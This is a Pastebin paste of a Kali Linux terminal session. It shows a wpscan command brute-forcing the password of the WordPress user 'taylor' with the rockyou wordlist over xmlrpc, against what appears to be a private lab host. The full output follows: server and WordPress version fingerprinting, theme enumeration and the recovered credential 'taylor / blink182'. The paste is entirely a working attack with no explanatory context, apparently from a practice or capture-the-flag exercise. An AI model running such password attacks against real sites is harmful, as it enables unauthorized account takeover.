Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- phil@kali:~$ wpscan --url 192.168.1.207/development --max-threads 20 --passwords /usr/share/wordlists/rockyou.txt --usernames taylor
- _______________________________________________________________
- __ _______ _____
- \ \ / / __ \ / ____|
- \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
- \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
- \ /\ / | | ____) | (__| (_| | | | |
- \/ \/ |_| |_____/ \___|\__,_|_| |_|
- WordPress Security Scanner by the WPScan Team
- Version 3.4.3
- Sponsored by Sucuri - https://sucuri.net
- @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
- _______________________________________________________________
- [i] Updating the Database ...
- [i] Update completed.
- [+] URL: http://192.168.1.207/development/
- [+] Started: Sun Feb 10 12:33:53 2019
- Interesting Finding(s):
- [+] http://192.168.1.207/development/
- | Interesting Entries:
- | - Server: Apache/2.4.6 (CentOS) PHP/5.4.16
- | - X-Powered-By: PHP/5.4.16
- | Found By: Headers (Passive Detection)
- | Confidence: 100%
- [+] http://192.168.1.207/development/xmlrpc.php
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 100%
- | References:
- | - http://codex.wordpress.org/XML-RPC_Pingback_API
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
- | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
- | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
- [+] http://192.168.1.207/development/readme.html
- | Found By: Direct Access (Aggressive Detection)
- | Confidence: 100%
- [+] WordPress version 5.0.3 identified (Latest, released on 2019-01-09).
- | Detected By: Rss Generator (Passive Detection)
- | - http://192.168.1.207/development/index.php/feed/, <generator>https://wordpress.org/?v=5.0.3</generator>
- | - http://192.168.1.207/development/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.0.3</generator>
- [+] WordPress theme in use: twentynineteen
- | Location: http://192.168.1.207/development/wp-content/themes/twentynineteen/
- | Latest Version: 1.2 (up to date)
- | Last Updated: 2019-01-09T00:00:00.000Z
- | Readme: http://192.168.1.207/development/wp-content/themes/twentynineteen/readme.txt
- | Style URL: http://192.168.1.207/development/wp-content/themes/twentynineteen/style.css?ver=1.2
- | Style Name: Twenty Nineteen
- | Style URI: https://github.com/WordPress/twentynineteen
- | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
- | Author: the WordPress team
- | Author URI: https://wordpress.org/
- |
- | Detected By: Css Style (Passive Detection)
- |
- | Version: 1.2 (80% confidence)
- | Detected By: Style (Passive Detection)
- | - http://192.168.1.207/development/wp-content/themes/twentynineteen/style.css?ver=1.2, Match: 'Version: 1.2'
- [+] Enumerating All Plugins
- [i] No plugins Found.
- [+] Enumerating Config Backups
- Checking Config Backups - Time: 00:00:04 <=================================================================================================================> (21 / 21) 100.00% Time: 00:00:04
- [i] No Config Backups Found.
- [+] Performing password attack on Xmlrpc against 1 user/s
- [SUCCESS] - taylor / blink182
- Trying taylor / 222222 Time: 00:01:07 <===================================================================================================================> (180 / 180) 100.00% Time: 00:01:07
- [i] Valid Combinations Found:
- | Username: taylor, Password: blink182
- [+] Finished: Sun Feb 10 12:35:17 2019
- [+] Requests Done: 252
- [+] Cached Requests: 4
- [+] Data Sent: 98.856 KB
- [+] Data Received: 22.798 MB
- [+] Memory used: 869.855 MB
- [+] Elapsed time: 00:01:24
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement